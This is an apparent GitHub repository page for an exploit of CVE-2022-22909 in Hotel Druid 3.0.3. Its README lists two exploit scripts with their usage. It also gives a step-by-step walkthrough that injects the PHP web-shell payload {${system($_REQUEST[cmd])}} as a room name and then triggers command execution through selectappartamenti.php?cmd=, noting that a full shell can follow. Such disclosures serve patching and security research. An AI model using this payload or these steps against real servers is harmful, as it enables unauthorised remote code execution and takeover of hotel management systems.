Skip to content

kaal18/CVE-2022-22909

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

HotelDruidExploit.py

HotelDruidExploit.py

 
 

HotelDruidExploitRoom.py

HotelDruidExploitRoom.py

 
 

README.md

README.md

 
 

Repository files navigation

CVE-2022-22909 Hotel Druid 3.0.3 - Remote Code Execution (RCE)

Exploit by kaal

Exploits

  1. HotelDruidExploit.py

This Exploit will create new room with our PHP payload as a room name .

Usage : $ ./HotelDruidExploit.py -h

image

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

image

  1. HotelDruidExploitRoom.py

This Exploit will work if you already know the Room name .

Usage : $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

image

Exploit Walkthrough :

1). Navigate to Hotel Druid page.

2). Click on Tables -> Rooms

image

3). In Create New Room field add below php code , and click on Add.

{${system($_REQUEST[cmd])}}

image

4). You will see new room with our payload in the "Room" name field .

image

5). Go to below link and you will get command Execution , Later you can get Full shell

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

Note : Change the Ip with your hoteldruid target IP.

Vulnerability Description :

This vulnerability occurs because room names are getting stored inside /var/www/html/hoteldruid/dati/selectappartamenti.php

image

And selectappartamenti.php is a PHP file so any PHP code inside that file will get executed by the server.

About

Exploits for Hotel Druid 3.0.3 - Remote Code Execution (RCE) CVE-2022-22909

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages